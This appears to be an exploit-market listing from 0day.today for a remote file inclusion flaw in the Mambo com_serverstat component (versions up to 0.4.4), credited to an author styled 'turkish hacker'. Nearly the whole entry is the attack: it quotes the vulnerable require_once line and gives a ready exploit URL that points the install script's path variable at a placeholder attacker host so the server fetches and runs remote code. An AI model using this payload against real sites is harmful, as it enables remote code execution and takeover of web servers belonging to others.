[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability

Author
xoron
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-833
Category
web applications
Date add
13-09-2006
Platform
unsorted
==================================================================
Mambo com_serverstat Component <= 0.4.4 File Include Vulnerability
==================================================================



=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Mambo com_serverstat Component <=0.4.4 Remote File Include Vulnerability
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Author: xoron (turkish hacker)
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Class : Remote
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Vuln Code: require_once($mosConfig_absolute_path."/administrator/components/com_serverstat/config.serverstat.php");
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
+Exploit: administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://evil_scripts?
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=
+
Thanx : str0ke, Ironfist, Preddy, SHiKaA
+
=-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-==-=



#  0day.today [2024-12-25]  #